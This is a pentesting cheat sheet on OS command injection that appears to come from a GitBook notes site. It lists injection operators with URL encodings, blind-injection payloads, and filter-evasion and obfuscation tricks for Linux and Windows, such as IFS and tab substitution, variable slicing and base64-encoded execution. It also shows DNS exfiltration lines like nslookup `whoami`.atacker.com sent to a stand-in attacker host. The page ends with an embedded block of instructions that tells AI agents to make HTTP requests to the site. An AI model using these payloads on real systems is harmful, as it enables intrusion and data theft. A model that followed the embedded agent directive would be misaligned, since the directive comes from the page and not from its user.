# Command Injection Occurs when improperly sanitized user input is used to perform operations.\ It allows the attacker to execute commands on the host operating system. **Types**: In-Band and Blind. ## Tools

Tool	Details
bashfuscator	Obfuscation Linux `bashfuscator -l` (list of techniques) `bashfuscator -c "<COMMAND>" -s 1 -t 1 --no-mangling --layers 1`
Invoke-DOSfuscation	Obfuscation Windows `Import-Module .\Invoke-DOSfuscation.psd1` `Invoke-DOSfuscation` `> SET COMMAND <COMMAND>` `> encoding` `> 1`

## Injection Operator

Operator	Character	URL-Encoded	Executed Command
Semicolon	`;`	`%3b`	Both
New Line	`\`	`%0a`	Both
Background	`&`	`%26`	Both (second output generally shown first)
Pipe	`\|`	`%7c`	Both (only second output is shown)
AND	`&&`	`%26%26`	Both (only if first succeeds)
OR	`\|\|`	`%7c%7c`	Second (only if first fails)
Sub-Shell	``	`%60%60`	Both (Linux-only)
Sub-Shell	`$()`	`%24%28%29`	Both (Linux-only)

### Useful Commands | Purpose of command | Linux | Windows | | --------------------- | ------------- | --------------- | | Name of current user | `whoami` | `whoami` | | Operating system | `uname -a` | `ver` | | Network configuration | `ifconfig` | `ipconfig /all` | | Network connections | `netstat -an` | `netstat -an` | | Running processes | `ps -ef` | `tasklist` | ### Blind {% tabs %} {% tab title="Time Delay" %} {% code overflow="wrap" %} ```bash ... && sleep 10 & # unix only ``` {% endcode %} {% code overflow="wrap" %} ```bash ... && ping -c 10 127.0.0.1 & # unix and windows ``` {% endcode %} {% endtab %} {% tab title="Web & DNS" %} {% code overflow="wrap" %} ```bash ... & whoami > /var/www/static/whoami.txt & ``` {% endcode %} {% code overflow="wrap" %} ```bash ... & nslookup atacker.com & ``` {% endcode %} {% code overflow="wrap" %} ```bash ... & nslookup `whoami`.atacker.com & ``` {% endcode %} {% endtab %} {% endtabs %} ## Bypassing Filters ### Space


TAB	`%09`
IFS	`$IFS` `${IFS}`
Bash Brace Expansion	`{ls,-la}`

### Characters in Variables


Linux Environment Variables	`printenv` `${<VARIABLE>:<START>:<LENGTH>}` `${PATH:0:1}` or `${LS_COLORS:10:1}`
Windows CMD	`set` `%<VARIABLE>:~<START>,<LENGTH>%` `%HOMEPATH:~0,1%` or `%HOMEPATH:~6,-11%`
Windows PowerShell	`[Get-ChildItem/cgi/ls/dir] env:` `$env:<VARIABLE>[<CHAR>]` `$env:<VARIABLE>.Substring(<FROM>, <TO>)` `$env:HOMEPATH[0]` or `$env:HOMEPATH.Substring(0, 2)`

### Shift Characters


Shift 1 →	`man ascii` (take previous character X) `$(tr '!-}' '"-~'<<<X)`

### Obfuscation {% tabs %} {% tab title="Linux" %}


`''` and `""` in command name	`w’h’oa’m’i` `w"h"oa"m"i`
`\` and `$@` in command name	`w\ho\a\mi` `wh$@oami`
`$()` in command name	`wh$()oami` `wh$(random)oami`
Case-Sensitive `${VAR,,}` takes the variable in lowercase, `${VAR^^}` in uppercase	`$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")` `$(a="WhOaMi";printf %s "${a,,}")` (in /bin/bash) `$(a="WhOaMi";echo ${a,,})`
Inverse	`echo 'whoami' \| rev` (get inverse) `$(rev<<<'imaohw')`
Encoding	`bash<<<$(base64 -d<<<BASE64)`

{% endtab %} {% tab title="Windows" %}


`''` and `""` in command name	`w’h’oa’m’i` `w"h"oa"m"i`
`^` in command name	`wh^oami`
`$()` in command name	`wh$()oami` `wh$(random)oami`
Case-Insensitive	`wHoAmi`
Inverse	`"whoami"[-1..-20] -join ''` (get inverse) `iex "$('imaohw'[-1..-20] -join '')"`
Encoding	`echo -n whoami \| iconv -f utf-8 -t utf-16le \| base64` (get base64 from linux) `iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('BASE64')))"`

{% endtab %} {% endtabs %} ***Note:** The commands seen can be written in many ways based on the filtered characters, try different ones (ex. `|` instead of `<<<` or `sh` for command execution)*

# EXAMPLE
find /usr/share/ | grep root | grep mysql | tail -n 1
tail -n 1 <<< $(grep mysql <<< $(grep root <<< $(find /usr/share/)))
tail -n 1 <<<$(grep mysql <<<$(grep root <<<$(find /usr/share/)))
tail%09-n%091%09<<<$(grep%09mysql%09<<<$(grep%09root%09<<<$(find%09/usr/share/)))
ta$@il%09-n%091%09<<<$(gr$@ep%09mysql%09<<<$(gr$@ep%09root%09<<<$(fin$@d%09/usr/share/)))
ta$@il%09-n%091%09<<<$(gr$@ep%09mysql%09<<<$(gr$@ep%09root%09<<<$(fin$@d%09${PATH:0:1}usr${PATH:0:1}share${PATH:0:1})))
ta$%40il%09-n%091%09<<<$(gr$%40ep%09mysql%09<<<$(gr$%40ep%09root%09<<<$(fin$%40d%09${PATH:0:1}usr${PATH:0:1}share${PATH:0:1})))

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://ivalexev.gitbook.io/rednote/pentesting-process/web-attacks/command-injection.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.